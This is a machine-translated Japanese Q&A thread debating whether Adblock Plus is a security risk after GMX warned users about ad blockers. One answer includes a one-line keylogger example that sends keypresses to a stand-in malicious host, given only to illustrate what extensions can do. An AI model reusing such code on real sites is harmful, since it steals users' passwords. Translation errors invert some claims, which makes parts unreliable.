web-dev-qa-db-ja.com

Adblock(Plus)はセキュリティリスクですか?

私のメールプロバイダーのウェブサイト(http://www.gmx.de)最近(ドイツ語)サイトへのリンクを開始しましたhttp://www.browsersicherheit.info/これは基本的に、サイトの外観を変更する機能により、Adblock Plus(およびその他)がフィッシングのために実際に悪用される可能性があると主張しています。そのサイトからの引用とその翻訳は次のとおりです。

Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser undkönnendaes for so much a Dritte weitergeben – auch Ihr Bank-Passwort。 Dies kann auf allen Web-Seiten passieren。 Sicherheitsmechanismen wie SSLkönnendas nicht verhindern。

翻訳:

このようなアドオンは、ブラウザのすべての入力にアクセスでき、銀行のパスワードを含めて、サードパーティに転送することもできます。これはすべてのWebサイトで発生する可能性があります。 SSLなどのセキュリティメカニズムはそれを回避できません。

OK、彼らは他の(かなり明らかにクラップウェアの)アドオンについて言及していますが、Adblock Plusは本当にセキュリティ上の脅威なのでしょうか、それともそのサイトの運営者は機会を利用して未経験のユーザーに広告をもう一度表示させようとしますか?

167
Tobias Kienzler

そうではありません。これは、GMXによるFUD( 恐怖、不確実性、および疑い )キャンペーンです。広告。上記の広告ブロッカーによるセキュリティリスクはまったくありません。彼らはそれをより正当に見えるようにするためにいくつかのクラップウェアをリストに追加しました。

もちろん、そのようなキャンペーンは非常に珍しく、特にGMXのような有名で有名な会社からのものです。残念ながら、私は手元に英語の情報源はありません(ドイツ語のみのキャンペーンであるため)が、ドイツ語を話すので、 heise.deのこの記事 を読むことをお勧めします。

アップデート#1:GMXの背後にある会社であるUnited Internetは、PCにセキュリティリスクがあると誤って主張することにより、顧客を誤解させることに対して多くの批判を受けました。 Wall Street Journal(ドイツ語版) は、GMXに表示される警告と、それらが「恐怖キャンペーン」にリンクするサイトに名前を付けました。

アップデート#2:GMXは、広告ブロッカーを使用するとリンクを表示しないが、広告を挿入するクラップウェア(サイトのリスト)を使用する場合はリンクを表示するようになりましたhttp://www.browsersicherheit.info/はそれに応じて更新され、現在は小さなクラップウェアのコレクションのみがリストされています。このリストは完全なものではないため、ブラウザにクラップウェアがインストールされているかどうかを知りたい場合は、信頼できるソースではありません。ただし、United Internetは、サイトにアクセスするユーザーに広告ブロッカーの使用を望まないという立場を維持しており、将来的には他のアンチブロッキングメソッドを開発する予定であると述べています( ドイツのソース )。

224
Andalur

更新

よく考えてから、他の回答にも同意する必要があります。データにアクセスできるという事実にもかかわらず、Adblockは侵入するよりもプライバシーを保護する可能性が高いです。実際のリスクは悪意のあるものですコンピュータにソフトウェアをインストールするように促す広告。 Adblockはこれらを防ぎます。

以下は、元の警告的な回答です。

はい、まったくそうです。

Adblock Plusは、独立した開発者によって開発されたブラウザ拡張/アドオンです。 Adblockは、すべてのページのDOM(ドキュメントオブジェクトモデル)にアクセスできます。

AdBlockが機能する方法は、ブラウザにスクリプトを挿入し、DOMを検索して、広告であると判断したものに対してhide()関数を実行することです。

つまり、AdBlock(およびChrome拡張機能)はDOMにアクセスできます。AdblockはJavaScript変数にアクセスできません。

これは何を意味するのでしょうか?

安全な認証を備えたWebサイトを使用していて、AuthKeyのようなプライベートなものを持つJavaScriptオブジェクトがある場合、あなたはsafeです。 AdBlockはJavaScript変数にアクセスできません。

ただし、AdBlockはこれと同等のコードを実行できます。

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

これは基本的に、押すキーをリモートサーバーにルーティングします。

これは、トークンを盗むよりもさらに悪いパスワードを盗むために使用できます。

それは言われて、AdBlock自体は危険ですか?

AdBlockは、開発者が自分自身を識別し、何百万人ものユーザーによって使用されているため、それほど危険ではないように思えます。上記のような注意が必要な場合は、誰かが気づいて笛を吹いたでしょう。

Chrome=拡張機能は完全に安全です。拡張機能はすべて、データやその他の悪意のあるものを盗む可能性があります。

他に何ができますか?

A Chrome Extensionは、次のセキュリティ違反を非常に簡単に実行することもできます...

  • 読んだメールまたはページのコンテンツをサードパーティのソースにルーティングします(このメールに暗号化されていないログイン情報が含まれている場合は、逮捕されます)画面に表示されている場合は、Chrome =延長、質問はありません。
  • フィールドに情報を入力し、送信ボタンを押します。たとえば、電子メールを送信します
  • ブラウザーを開いたままにし、拡張機能がその方法を知っている場合、拡張機能は電子メールインターフェイス(Gmail、Outlook)を使用して、選択した電子メールを連絡先に送信できます。これは取るに足らないことです。
  • ボタンに関連付けられたスクリプトを変更します(それがもともとjQueryで配置されていた場合)。たとえば、サインイン情報をサーバーに送信するボタンを少し変更して、その情報をサーバーとhttp://mymaliciousserverの両方に送信することができます。これは取るに足らないことです。

更新

AdBlockがオープンソースであることは、ディスカッションを通じて確認されています。これにより、AdBlockをより信頼できるようになりますが、それらのことを実行できる能力であることを忘れないでください。ソースを確認しましたが、何が起こっているのかまったくわかりません。

出典:私はJavaScriptであり、Chrome Extension developer。

110
Code Whisperer

これは本当に信頼の問題に帰着します。今日、AdBlock拡張機能は安全です。 (その他の回答 が指摘するように)技術的な能力があっても、データを盗むことはありません。

ただし、Chrome拡張機能はサイレントで自動的に更新されます。

AdBlock拡張機能の開発者が悪意のあるコードを追加しないことを信頼していますか?私は個人的にそうしています–何百万人ものユーザーがいると、悪意のあるコードはすぐに気づかれ、間違いなく開発者にとってキャリアキラーになるでしょう。

あなたが開発者を信頼しているとしても、あなたをさらす可能性のあるシナリオはまだありません:

偏執狂の場合、これらの問題は次の方法で軽減できます。

  • シークレットモード(拡張機能はデフォルトで無効になっています)を使用して機密サイト(バンキングなど)にのみログインします。
  • 自動拡張機能の更新を無効にする ですが、明らかに多くの便利さが失われます。

したがって、「いいえ、リスクはない」と言うことは知的に不正直ですが、リスクはGMXによって完全に誇張されています。 Googleが個人データを盗まないブラウザを提供することを信頼しているのと同じように、AdBlock開発者が私のデータを盗まない拡張機能を提供することを信頼しています。

悪意のあるコードで更新された拡張機能のリスクは十分に小さいので、心配する必要はありません。少しでも心配したとしても、拡張機能を無効にするのは簡単です。

54
josh3736

すべてのソフトウェアはセキュリティリスクですが、この場合、彼らの主張は誤解を招くものです。

すべてのアドバイスが潜在的に悪いものであり、すべてのトランザクションが潜在的に詐欺的であるように。 「リスク」は、セキュリティが保証されていないことを意味し、100%の場合に当てはまります。

しかし、AdBlock Plusの場合、ソフトウェアはよく理解されており、ユーザーの利益を保護する実績を持つチームによって開発されています。さらに、それはオープンソースなので、セキュリティの問題について自分で調べるための ソースコードが利用可能 です。したがって、この場合、リスクは最小限です。ささいなことです。

代わりに、GMXはthisソフトウェアが危険であり、せいぜい誤解を招く、そしておそらく中傷的なものであることを示唆するために、自明の理(「ソフトウェアは常に危険」です)を使用しています。 それは、レストランのオーナーが、競合他社が自分の食べ物を中毒している可能性があることを伝えるチラシを配っているようなものです。「とはいえ」、しかしその行動は基本的に不正直です。

42
tylerl

ただの観察です-私は特に知識の少ない友人や仲間のために広告ブロッカーを宣伝する傾向があります-それは減少するセキュリティの脅威だからです。どうやって? Web上の最も悪質なコンテンツの多くは、「ここをクリックしてPCを高速化するにはここをクリックしてください」などの誤解を招く広告の形で提供されるため...これらは広告ブロッカーによってほとんど消えます。

20
Wyrmwood

Adblock(他の拡張機能、さらに言えばブラウザ開発者)は、大量のデータを取得する技術的能力を備えており、サードパーティアプリケーションの実行に関連するすべてのリスク、つまりベンダーが悪意を持っている可能性があります。そして、あなたのセキュリティを壊す彼らのソフトウェアにバグがあるかもしれません。

そうは言っても、私はAdBlockをフィッシングに対する防御と見なします。疑わしいソフトウェアの多くは、他のものになりすましている広告を通じてユーザーにプッシュされます。 、サイトはユーザーが望むいくつかのアイテムを提供しますが、ダウンロードボタンのように見える広告があり、サイト上の実際のコンテンツの代わりにいくつかのアドウェア/マルウェア製品を配信します。そのような「誤って」ダウンロードされたマルウェアは深刻なセキュリティリスクです。同様に、ゼロデイエクスプロイトを含む広告バナーを実行することによる大量消費者攻撃のインシデントがあり、尊重された信頼できるサイトにエクスプロイトが表示される可能性があります。

会社全体のセキュリティ慣行では、AdBlockを要求し、デフォルトですべてのワークステーションにインストールするのが理にかなっています。自分でインストールしない未経験のユーザーを保護するのに特に役立つためです。これは、もう1つのソフトウェア製品を信頼することによってリスクを引き起こしますが、日常のセキュリティにとっては正のプラスになります。

9
Peteris

この情報がユナイテッドインターネットによって広められる方法は誤解を招くものです(私は「名誉毀損」を言わないように懸命に努力しています)。現状の主張はすべての客観的な手段によって明らかに間違っており、プレゼンテーションは中傷的です。

もちろん、原則として、Adblock(Plus)はもちろんpotentialセキュリティリスクであることを認めなければなりません。このリスクがreasonableの懸念に値するかどうかは、別の問題です。

Adblock(Plus)mightは、次の3つの理由でセキュリティリスクになります。

  1. それはあなたのコンピュータで動くソフトウェアであり、couldは、すべてのソフトウェアと同様に、原則としてほとんど何でもします。虚偽の情報を表示したり、データを盗んだりすることを含みます。
  2. それはdoesウェブページの内容を変更します、それが広告をブロックすることです。確かに、well-knownで、Webページのコンテンツを変更するソフトウェアcouldは、悪意のある方法でコンテンツを変更し、他のソフトウェアよりもはるかに簡単に気付かれない。
  3. EasyListなどのさまざまな(制御されていない/不明な)サードパーティからの正規表現のダウンロード可能なリストを照合することにより、このタスクを実行します

したがって、ウルトラパラノイアモードの場合、EasyList(または別のフィルターリストプロバイダー)の誰かがフィルターリストを変更して悪意のある操作を行うか、ハッカーがサイトを乗っ取るのを恐れるかもしれません。 Adblock Plusアドオンは、おそらく、知らないうちに検証の手段なしに、毎日/毎週の更新中に悪意のあるリストをダウンロードするでしょう(埋め込み可能なチェックサムがありますが、これは偶発的な破損からのみ保護し、悪意のある変更からは保護しません)。
その結果、このような悪質なブロックリストcouldは、理論上、アドオンに「悪質なこと」をさせます。

幸運なことに、JSの悪用とは別に、Adblockの動作方法により、この攻撃ベクトルを介してrealisticallyに悪影響を及ぼすことはあまりありません(任意の正規表現に一致しますが、しないでください任意のsusbstitutionsであるため、非表示にしない要素を非表示にしたり、一部の広告を通過させたりすることは、可能な限り最悪のケースです)。
一方、JSブロックを使用すると、そもそもAdblock Plusを実行していなくても使用できます。

また、明らかに、サードパーティのソフトウェア(FirefoxやChrome自体を含む)など)と同様に、Adblock Plusアドオン自体couldがデータを盗みます。現在のところ、今のところこれは発生していません
そして、ビジネスの大部分の大企業は、誰もが反対しない毎日、信頼できないことをしています。

ここで、Adblock Plusがユーザーデータをindeed盗む可能性と、そのようなものが1日または2日より長く検出されなくなる可能性がどのくらいあるかを自問する必要があります。 -デプロイされたオープンソースプロジェクト。

率直に言って、これが深刻で現実的な脅威であり、影響を受ける可能性があると思われる場合は、MicrosoftがNSA =すでにID盗難機能がWindowsに組み込まれており、すべてのコンピュータにUS DoDが自由にアクティブ化できる秘密の「キルスイッチ」があります(これも原則可能であり、実際には可能性が高いAdblockの作者が貯金を盗むよりも本当である可能性が高い)。

willmayではなくwillという表現に注意してください)このため、GMXも信頼しないでください。すべての個人データと交通情報を悪意のある非倫理的な方法で他の当事者と共有します(少なくとも米国の代理店とは、シュレーダーの2001年の条約によりますが、他の誰と話すかはできません)。
また、1&1(ユナイテッドインターネットの別のメンバー)を信頼すべきではありません。彼らはwillがwho-knows-whom(米国に拠点を置く会社)と個人データを共有するためです。グーグルも、それ以外のインターネットの半分も。

一方、Adblock Plusは、過去にpreventedマルウェアがユーザーのコンピューターにインストールされたことを明らかに示しています。

8
Damon

他の答えは、信頼以外の問題について言及することを忘れています:そのadblockは、アクセスするページを変更しています。このため、より多くの開発者を信頼する必要があるため、広告ブロックソフトウェア/ブラウザプラグインを使用したことがないので、これはお勧めしません。

ウェブサイトがセキュリティのためにあらゆる種類の壊れやすい不変条件に依存していることはよく知られています。たとえば、過去のクリックジャッキングへの取り組み方をご覧ください。セキュリティのためにサイトが依存する不変条件に誤って違反することからadblockを止めるものは何もありません。

また、adblockおよびその他の広告ブロックソフトウェアは匿名性を低下させます。敵対者は、コードを実行してDOMツリーを参照し、欠落している部分や変更がないかどうかを調べたり、広告関連のコンテンツ(一部はサイト自体でホストされている可能性があるコンテンツ)をフェッチする特定のリクエストを行っていないことを受動的に観察したりできます。それを可能な敵とする)。

3
Longpoke

ここで誰も言及していないことは、Adblock plusの他のほとんどすべてのブラウザーと拡張機能がリモートで更新できることです。これは、特定の「信頼できる」更新URLにロックされている場合でも、プログラムにバックドアが存在する必要があることを意味します。これはスパイウェアと解釈できますが、スパイウェアはやや抽象的な用語です。

特にAdblock plusが悪意のないものであることは広く認められていますが、データの読み取りと送信の権限があるため、ほとんどの人が安全ではないと言っているのは事実です。ほとんどの部分がオープンソース(Adblockを含む)ですが、ブラウザーソフトウェアと拡張機能は、これらのサービスのコードがリモートにありアクセスできないため、実際にどれほど安全であるかを知る方法がない更新URLと同じくらい安全です。

エントロピーとユーザーがいるため、100%安全なソフトウェアやサーバーはありませんが、可能な限り最高のセキュリティを得るには、ソースコードを調べ、常にソースからビルドし、自動更新を無効にする必要があります。すべてのソフトウェアと同様に、ブラウザと拡張機能は、ユーザーが作成した場合と同じくらい安全です。

2
tpbapp